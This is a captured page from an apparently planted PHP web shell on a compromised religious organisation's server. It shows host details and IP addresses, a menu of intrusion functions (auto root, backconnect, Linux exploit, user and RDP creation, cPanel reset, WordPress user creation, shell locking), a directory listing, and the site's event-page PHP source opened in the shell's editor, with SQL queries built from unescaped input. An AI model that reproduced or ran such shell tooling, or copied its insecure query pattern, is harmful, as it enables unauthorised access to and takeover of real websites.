Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.6
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mobile /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flowplayer
[ DIR ]
drwxr-xr-x
mobilecommon
[ DIR ]
drwxr-xr-x
mobileimages
[ DIR ]
drwxr-xr-x
mobilejs
[ DIR ]
drwxr-xr-x
mp3player
[ DIR ]
drwxr-xr-x
appsgames.html
3.17
KB
-rw-r--r--
appsgames.php
4.16
KB
-rw-r--r--
comingevent.html
3.17
KB
-rw-r--r--
comingevent.php
7.6
KB
-rw-r--r--
comingevent_25-10-13.php
6.82
KB
-rw-r--r--
comingeventdetail.php
9.29
KB
-rw-r--r--
currentnewsdetail.php
8.17
KB
-rw-r--r--
disclaimer.html
3.17
KB
-rw-r--r--
disclaimer.php
2.79
KB
-rw-r--r--
downloadrigtone.php
228
B
-rw-r--r--
error_log
38.02
MB
-rw-r--r--
flowplayer.swf
4.05
KB
-rw-r--r--
index.php
7.84
KB
-rw-r--r--
index_25-10-13.php
6.67
KB
-rw-r--r--
index_29-10-12.html
3.17
KB
-rw-r--r--
index_31_oct.php
7.12
KB
-rw-r--r--
index_old.html
348
B
-rw-r--r--
policy.html
3.17
KB
-rw-r--r--
policy.php
2.79
KB
-rw-r--r--
ringtones.html
3.17
KB
-rw-r--r--
ringtones.php
4.7
KB
-rw-r--r--
ringtones_ds.php
3.89
KB
-rw-r--r--
ringtones_ds1.php
4.12
KB
-rw-r--r--
terms.html
3.18
KB
-rw-r--r--
terms.php
2.79
KB
-rw-r--r--
todaysevent.html
3.17
KB
-rw-r--r--
todaysevent.php
7.64
KB
-rw-r--r--
todaysevent_25-10-13.php
6.9
KB
-rw-r--r--
todayseventdetail.php
9.77
KB
-rw-r--r--
todayseventdetail_25-10-13.php
9.05
KB
-rw-r--r--
videos.html
3.17
KB
-rw-r--r--
videos.php
4.25
KB
-rw-r--r--
videosdetail.php
4.41
KB
-rw-r--r--
wallpapers.html
3.17
KB
-rw-r--r--
wallpapers.php
3.67
KB
-rw-r--r--
wallpapers_29-10-12.php
3.94
KB
-rw-r--r--
wallpapers_ds.php
3.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : todaysevent.php
<!DOCTYPE html> <html> <head> <title>Aryasamaj</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="css/mobile.css" type="text/css" /> <script type="text/javascript" src="mobilejs/common.js"></script> </head> <body> <div class="wrapper" data-role="page"><!-- wrapper start --> <div class="inner_wrapper"><!-- inner_wrapper start --> <div class="header"><!-- header start --> <div class="logo"> <a href="index.php"><img src="mobileimages/logo.png" alt="International Arya Mahasammelan 2012" /></a> </div> <h3>The Aryasamaj</h3> <div class="clr"></div> </div><!-- header end --> <div class="menu"><!-- menu start --> <ul> <li><a href="index.php" data-transition="slide" >Current News</a></li> <li><a href="comingevent.php">Coming Events</a></li> <li class="active"><a href="todaysevent.php">Today's Events</a></li> <li><a href="wallpapers.php">Wallpapers</a></li> <li><a href="ringtones.php">Ringtones</a></li> <li><a href="videos.php">Videos</a></li> <li><a href="appsgames.php">Apps & Games</a></li> <div class="clr"></div> </ul> </div><!-- menu end --> <div class="clr"></div> <?php //created by dharmishtha include("mobilecommon/aryasamaj-clientconnection.php"); ?> <div class="content"><!-- content start --> <form action="" method="post" name="frmpaging" id="frmpaging"> <input type="hidden" name="page" value="" /> </form> <form action="todayseventdetail.php" method="post" name="frmeventpage" id="frmeventpage"> <input type="hidden" name="eventid" id="eventid" value="" /> <input type="hidden" name="eventpage" id="eventpage" value="" /> </form> <?php $current = date("Y-m-d"); $qrySelEvent="SELECT * FROM arya_event WHERE event_periodenddate>='".$current."'"; $qSelEvent=mysql_query($qrySelEvent); $Totalrowsevent=mysql_num_rows($qSelEvent); $page =$_POST['page']; $limit=5; $script_name="todaysevent.php"; $paging=display_paginglist($page,$Totalrowsevent,$limit,$script_name,$pagequery_vars); $qSelEvent=mysql_query($qrySelEvent." limit $eu, $limit ") or GoToErrorPage(); $numrow=mysql_num_rows($qSelEvent); $i=1; if($Totalrowsevent > 0) { while($qFetchEvent=mysql_fetch_array($qSelEvent)) { $id=$qFetchEvent["event_id"]; $image1=$qFetchEvent["event_image"]; $startdate1=date("d-M-Y",strtotime($qFetchEvent["event_startdate"])); $eventstime1=stripslashes($qFetchEvent["event_starttime"]); $eventetime1=stripslashes($qFetchEvent["event_endtime"]); $cityid1=$qFetchEvent["city_id"]; $cityName = stripslashes(getFieldValue("city_name","arya_city","city_id=".$cityid1."")); $stateid1=$qFetchEvent["state_id"]; $stateName = stripslashes(getFieldValue("state_name","arya_state","state_id=".$stateid1."")); $cntid1=$qFetchEvent["cnt_id"]; $countryName = stripslashes(getFieldValue("cnt_name","arya_country","cnt_id=".$cntid1."")); $title1=stripslashes($qFetchEvent["event_title"]); $address1=stripslashes($qFetchEvent["event_address"]); $instid1=$qFetchEvent["inst_id"]; $instname=stripslashes(getFieldValue('inst_name','arya_institution','inst_id="'.$instid1.'"')); $shorttext1=stripslashes($qFetchEvent["event_shorttext"]); $servername=$_SERVER['SERVER_NAME']; $servernew=$servername."/mobile"; ?> <div class="event_info"><!--event_info start--> <div class="img_div"><!--img_div start--> <!--<img src="../aryaadmin/images/eventphoto/thumb/<?php echo $image1;?>" alt="" title="" />--> <?php if($servername=="www.aryasamajdelhi.pb") { ?> <img src="http://www.aryasamajdelhi.pb/aryaadmin/images/eventphoto/bigthumb/<?php echo $image1;?>" width="236" alt="" title="" /> <?php } else if($servername=="mobile.thearyasamaj.com") { ?> <img src="http://www.thearyasamaj.com/aryaadmin/images/eventphoto/bigthumb/<?php echo $image1;?>" width="236" alt="" title="" /> <?php } else if($servernew=="www.thearyasamaj.com/mobile") { ?> <img src="http://www.thearyasamaj.com/aryaadmin/images/eventphoto/bigthumb/<?php echo $image1;?>" width="236" alt="" title="" /> <?php } ?> <p><?php echo $startdate1;?> <br /></p> <?php if($eventstime1 !="") { ?> <p><?php echo $eventstime1;?>-<?php echo $eventetime1;?><br /></p> <?php } ?> <p><?php echo $cityName;?><br /></p> </div><!--img_div end--> <div class="cont_div"><!--cont_div start--> <h4><a href='javascript:Redirectdetailevents(<?php echo $id;?>,"todayseventdetail.php");'><?php echo $title1;?></a></h4> <p> <?php if($address1 !="") { echo $address1." , " ; } if($cityName !="") { echo $cityName." , "; } if($stateName !="") { echo $stateName." , "; } echo $countryName; ?> </p> <p><span class="name"><?php echo $instname;?></span></p> <p class="normal_text"><?php echo $shorttext1;?></p> </div><!--cont_div end--> <div class="clr"></div> </div><!--event_info end--> <?php if($i%$numrow) { ?> <div class="bot_line"></div> <?php } else { if($numrow==1) { ?> <?php } } ?> <?php $i++; } } else { echo $msgsearch="<p class='error_msg' align='center'>No Record Found</p>"; } if($paging!="") {?> <div class="pagination"><!--pagination end--> <?php echo $paging;?> </div><!--pagination end--> <?php } mysql_close($sqlconn);?> </div><!-- content end --> <div class="footer"><!-- footer start --> <div> <div class="social_icons"><!-- social_icons start --> <div class="soc_link"> <a href="http://www.twitter.com/thearyasamaj" target="_blank" ><img src="mobileimages/twitter.png" alt="Click here to visit our twitter page" title="Click here to visit our twitter page" /></a> <a href="http://www.facebook.com/arya.samaj" target="_blank"><img src="mobileimages/facebook.png" alt="Click here to visit our facebook page" title="Click here to visit our facebook page" /></a> </div> <div class="gww"><a href="#">Powered by</a> <a href="http://www.jbm-group.com" target="_blank"><img src="../images/jbmlogo.png" alt="JBM Group" width="46" height="14" align="absbottom" title="JBM Group" /></a></div> <div class="fb_like" > <iframe src="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/arya.samaj" scrolling="no" frameborder="0" style="border:none; float:left; width:100%; height:24px; margin:-10px 0 0 0;"> </iframe> </div> <div class="clr"></div> </div><!-- social_icons end --> </div> <div class="btm_link"><!-- btm_link start --> <div class="con_link"> <a href="disclaimer.php" >Disclaimer</a> | <a href="policy.php">Privacy Poicy </a> | <a href="terms.php">Terms & Condiitons</a> </div> </div><!-- btm_link end --> </div><!-- footer end --> </div><!-- inner_wrapper end --> </div><!-- wrapper end --> </body> </html>
Close